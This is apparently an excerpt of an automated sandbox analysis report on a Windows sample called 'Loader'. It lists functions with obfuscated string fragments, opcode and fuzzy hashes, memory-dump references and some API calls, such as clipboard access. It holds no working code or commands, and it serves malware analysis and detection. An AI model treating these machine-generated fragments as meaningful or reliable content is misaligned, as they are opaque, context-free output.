                                                                                        • String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
                                                                                        • API String ID: 0-2173774466
                                                                                        • Opcode ID: 756f7b0933827cf2b67dc0df76dc687c74b968bdae32b9d0fabc7d97671765a6
                                                                                        • Instruction ID: af53e175c28fad5d8c2a468ceeaa10e57feed0e13a8b405b96cf19100150d275
                                                                                        • Opcode Fuzzy Hash: 756f7b0933827cf2b67dc0df76dc687c74b968bdae32b9d0fabc7d97671765a6
                                                                                        • Instruction Fuzzy Hash: BA13BE7160C7C08AD335DB38C4443AFBBE1ABD6314F188A6EE4D987392D6B98581CB57
                                                                                        Function 00435B98 Relevance: 85.4, Strings: 68, Instructions: 403COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                        • API String ID: 0-2551631551
                                                                                        • Opcode ID: 2e1487be5e160dde3cb2099712e244fca7148de13dbc5873c5731017f8a6f69d
                                                                                        • Instruction ID: 770335e5a42f9b4d615ca172ea7afd8b2f0587deb4f207754e917c3cbcfa6561
                                                                                        • Opcode Fuzzy Hash: 2e1487be5e160dde3cb2099712e244fca7148de13dbc5873c5731017f8a6f69d
                                                                                        • Instruction Fuzzy Hash: 2C224121D087D98DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7794A46CBA6
                                                                                        Function 004365B4 Relevance: 85.4, Strings: 68, Instructions: 398COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                        • API String ID: 0-2551631551
                                                                                        • Opcode ID: 4134afc953a5d969655b1307a453eca2e2e2adfc96ef722da3857e9020b64b7e
                                                                                        • Instruction ID: de50ea2c20b4176c8acefd8da3a13ecea5557a43b1ccc23e89203943b2e10b97
                                                                                        • Opcode Fuzzy Hash: 4134afc953a5d969655b1307a453eca2e2e2adfc96ef722da3857e9020b64b7e
                                                                                        • Instruction Fuzzy Hash: 99225121D087DA8DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7754A46CBA6
                                                                                        Function 0043506D Relevance: 39.1, Strings: 31, Instructions: 329COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$0$1$4$<$>$M$Q$R$S$U$a$b$c$c$e$g$g$i$k$m$n$o$q$s$u$w$y${$}$~
                                                                                        • API String ID: 0-379513683
                                                                                        • Opcode ID: 4e3a5e5ada1ce48c2110f860dc72302ab2009045dbcee54d2719bf77ed452430
                                                                                        • Instruction ID: fbc6194e022bf2d7584349dbc9d518ea0f683462fe8accb2f8c95ac37d1c220e
                                                                                        • Opcode Fuzzy Hash: 4e3a5e5ada1ce48c2110f860dc72302ab2009045dbcee54d2719bf77ed452430
                                                                                        • Instruction Fuzzy Hash: EBF1D2319087E98ADB36C63C8C543DDBEA25B56324F0843E9C4ED6B3D2C6B50BC58B56
                                                                                        Function 00418638 Relevance: 24.0, Strings: 19, Instructions: 221COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
                                                                                        • API String ID: 0-2572281532
                                                                                        • Opcode ID: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                        • Instruction ID: fc9c91e7f1a30bb03526ffdc58390b239219c7e1b2437cd68821ef081b52b0d4
                                                                                        • Opcode Fuzzy Hash: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                        • Instruction Fuzzy Hash: B581BEB29193918BC33A8F15C8853DFBBE2FBC0304F59892DC4999B354DB754602CB4A
                                                                                        Function 00424AA8 Relevance: 21.7, Strings: 17, Instructions: 444COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                        • API String ID: 0-416511104
                                                                                        • Opcode ID: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
                                                                                        • Instruction ID: 3a13b98e1fcd4ee340008fd0ff9d0d16dd32adc4ff5d5dd5518182cac15cbb42
                                                                                        • Opcode Fuzzy Hash: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
                                                                                        • Instruction Fuzzy Hash: 2E420AB560C3948AD334CF55D442BCFBAF2FB92304F00882DC5D9AB615DBB54A468B9B
                                                                                        Function 00425691 Relevance: 21.7, Strings: 17, Instructions: 435COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                        • API String ID: 0-416511104
                                                                                        • Opcode ID: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
                                                                                        • Instruction ID: ca3b89ee566e4ff942ad83ab59672ef17daa3edc381adbb1ac583b775d9a42f8
                                                                                        • Opcode Fuzzy Hash: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
                                                                                        • Instruction Fuzzy Hash: 4A421CB520C3D48AC334CF54D442B9FBAF2FB92304F40882DC5D96B615DBB54A468B9B
                                                                                        Function 00EFC970 Relevance: 18.4, Strings: 9, Instructions: 7105COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -$1$8H$?$Hg@$M5/$Ph7m$z&$-CV
                                                                                        • API String ID: 0-3808867540
                                                                                        • Opcode ID: 5738cec0cd070931a0bd783de9f3970d3231cfa437676acf953e2766095c838c
                                                                                        • Instruction ID: d9ec357a2f8233dc95ae847e4ea7abc86a244de867b874025c8ba10d5d92dae9
                                                                                        • Opcode Fuzzy Hash: 5738cec0cd070931a0bd783de9f3970d3231cfa437676acf953e2766095c838c
                                                                                        • Instruction Fuzzy Hash: 2FF30175D012698FCB58CFA9D9916ECBBF1FF58310F1481AAE498E7381E2385A81DF50
                                                                                        Function 00EF6A30 Relevance: 17.7, Strings: 10, Instructions: 5180COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ;\q$$>$Cd($FO}$FO}$H<~O$`$h$|$|
                                                                                        • API String ID: 0-1321615942
                                                                                        • Opcode ID: d4531aded3b414f1182a6519129ae5696528d523657ed0a8a391442540f6f545
                                                                                        • Instruction ID: cd8e576c554ce56a4545c70e44c18204c00b7a719232fd999c0f67f560bb0097
                                                                                        • Opcode Fuzzy Hash: d4531aded3b414f1182a6519129ae5696528d523657ed0a8a391442540f6f545
                                                                                        • Instruction Fuzzy Hash: 59C3F175D022698FCB68CFA9D9916ECBBF0FB58314F1481AAE458E7385D3349A85CF10
                                                                                        Function 0040AD40 Relevance: 12.9, Strings: 10, Instructions: 410COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &x&z$.|#~$/pQr$<|8~$a()*$d<h>$l0f2$m4f6$ws$|x
                                                                                        • API String ID: 0-1443210402
                                                                                        • Opcode ID: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                        • Instruction ID: 5a455e5b33dc051389bcb969b85f11440245edd1c99918e46ba8560acc0916f5
                                                                                        • Opcode Fuzzy Hash: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                        • Instruction Fuzzy Hash: E9F176B5600B02DFD3348F25D895797BBE1FB46315F118A2CD5AA8BBA0C775A805CF88
                                                                                        Function 00437180 Relevance: 12.8, Strings: 10, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $%$)$.$?$C$K$Y$v$v
                                                                                        • API String ID: 0-1948704018
                                                                                        • Opcode ID: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                        • Instruction ID: f70cb8b5534ef894ef439ad6c336ad61d0d4793a511eb9a38b6a33aaea9181ad
                                                                                        • Opcode Fuzzy Hash: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                        • Instruction Fuzzy Hash: 15A14D23A0C7D14AD321857D4C8425BEEC30BEA224F1ECB6ED8E5973C6D579C9069393
                                                                                        Function 004327B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132clipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                        • String ID: T
                                                                                        • API String ID: 2832541153-3187964512
                                                                                        • Opcode ID: f69b22f7e65234b8b8295d773221abc16353644711cc119bd34ed76aaf3f7017
                                                                                        • Instruction ID: 2c952f62104fe5d4509db1f6639d41a4f4bf987f5331e4494cef66cb5abed10d
                                                                                        • Opcode Fuzzy Hash: f69b22f7e65234b8b8295d773221abc16353644711cc119bd34ed76aaf3f7017
                                                                                        • Instruction Fuzzy Hash: 6841E6B160C7818ED310AF7C998835FBED05B86324F044B3EE5E5862D2D6788689C79B
                                                                                        Function 00427780 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 453COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: '7lG$.;)9$SO$V9!,$bH>,
                                                                                        • API String ID: 0-3057601594
                                                                                        • Opcode ID: a05e2da8a91ea2381bd4f5517da9f1188409bddd6ac8d8d45cb515e4ccce1d79
                                                                                        • Instruction ID: 89be8276579ee34aed10616cce504172f3d28cd0adcf7ab04e391ecd321fe4a1
                                                                                        • Opcode Fuzzy Hash: a05e2da8a91ea2381bd4f5517da9f1188409bddd6ac8d8d45cb515e4ccce1d79
                                                                                        • Instruction Fuzzy Hash: 60E1EDB5A0D750CFD3209F25E80176BBAE1FBC5304F05896DE6D89B361EB388905CB96
                                                                                        Function 0041A150 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1622COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0043C330: LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A7FA
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A89B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                        • String ID: AB$I,~M$N@
                                                                                        • API String ID: 764372645-1338355008
                                                                                        • Opcode ID: 87d029fab604df654e333a86497e3f933b33b055a423a38a51ed2ea54ee66927
                                                                                        • Instruction ID: e1ca4a59bde15fa5924e3eed146bb9730fe9803e238724338574477127e3de75
                                                                                        • Opcode Fuzzy Hash: 87d029fab604df654e333a86497e3f933b33b055a423a38a51ed2ea54ee66927
                                                                                        • Instruction Fuzzy Hash: ACA255352493009FD724DB24C881BABBBE3EBC5314F19C82EE5D587352D779D8868B86
                                                                                        Function 00F0DA50 Relevance: 10.2, Strings: 5, Instructions: 3943COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9$H&E$Y$mPn:$3>
                                                                                        • API String ID: 0-2345019429
                                                                                        • Opcode ID: febf31179c9158bb0a5ac84713e00be4929cb36f55f41c6493a71bb789647f61
                                                                                        • Instruction ID: d47d6ca72a1d413514410f8b50b3fea5046e1a07394dd2bd7e4b112f77eb886f
                                                                                        • Opcode Fuzzy Hash: febf31179c9158bb0a5ac84713e00be4929cb36f55f41c6493a71bb789647f61
                                                                                        • Instruction Fuzzy Hash: 5E830F75D022698FCB18CFA9D9916ECBBF0FF58314F1481AAE458E7385E2385A81DF50
                                                                                        Function 00F1E170 Relevance: 9.7, Strings: 5, Instructions: 3450COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$/8Vv$0T=$\D$`
                                                                                        • API String ID: 0-231379867
                                                                                        • Opcode ID: 7ff883a479b97234937740578b6cf5ff9aad3794594dd056ef1c83b35b465156
                                                                                        • Instruction ID: 8520b0cbbba61f5ea5e7673b11946a9e0e6a357dcd8d971d85960fc4cb34b278
                                                                                        • Opcode Fuzzy Hash: 7ff883a479b97234937740578b6cf5ff9aad3794594dd056ef1c83b35b465156
                                                                                        • Instruction Fuzzy Hash: F1730375E012698FCB58CFA9D9916ECBBF1BF58314F1480AAE458E7385E3349A85CF10
                                                                                        Function 00EFB9E0 Relevance: 8.5, Strings: 6, Instructions: 1040COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *8$5c$;@$=$[kl?$v
                                                                                        • API String ID: 0-597541668
                                                                                        • Opcode ID: d43680d7f439d62195c82aadc37c84980898568370f4c9d388a87de827e94209
                                                                                        • Instruction ID: fa9dcf263569d76010931c9ac676227f424c82640eae9ee3774da9e4dad54a2a
                                                                                        • Opcode Fuzzy Hash: d43680d7f439d62195c82aadc37c84980898568370f4c9d388a87de827e94209
                                                                                        • Instruction Fuzzy Hash: 6BA29A71D022698FCB18CFA9D9911EDBBF1FB58314F24816AE4A4EB385D3389985CF50
                                                                                        Function 00422F0D Relevance: 8.1, Strings: 6, Instructions: 628COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: '#%;$.1&*$066&$0~#/$_F$3B
                                                                                        • API String ID: 0-1609436745
                                                                                        • Opcode ID: fa66c99ca37da699954322922a165e2e58b78f0410072dc6387183f5db52dd74
                                                                                        • Instruction ID: 7ea3dd8e245a26d41854b7de1f2706448979532b446e58bce8047c1e76753e38
                                                                                        • Opcode Fuzzy Hash: fa66c99ca37da699954322922a165e2e58b78f0410072dc6387183f5db52dd74
                                                                                        • Instruction Fuzzy Hash: E6120D75608211DFE714CF28E89172BB7E2FB8A315F59893CE88297291D738ED11CB46
                                                                                        Function 0041CA70 Relevance: 6.9, Strings: 5, Instructions: 626COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: +$4l/n$HI$AC$EG
                                                                                        • API String ID: 0-2131502145
                                                                                        • Opcode ID: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
                                                                                        • Instruction ID: a4ec15649f5ce789aa249a628662369405bf800bf02bbfe84a00a1b55f3e5535
                                                                                        • Opcode Fuzzy Hash: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
                                                                                        • Instruction Fuzzy Hash: B21233B650C3509BC704DF65CC926ABBBE2EF82314F08886DF4C58B391E7399945CB96
                                                                                        Function 004111A6 Relevance: 6.8, Strings: 5, Instructions: 541COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
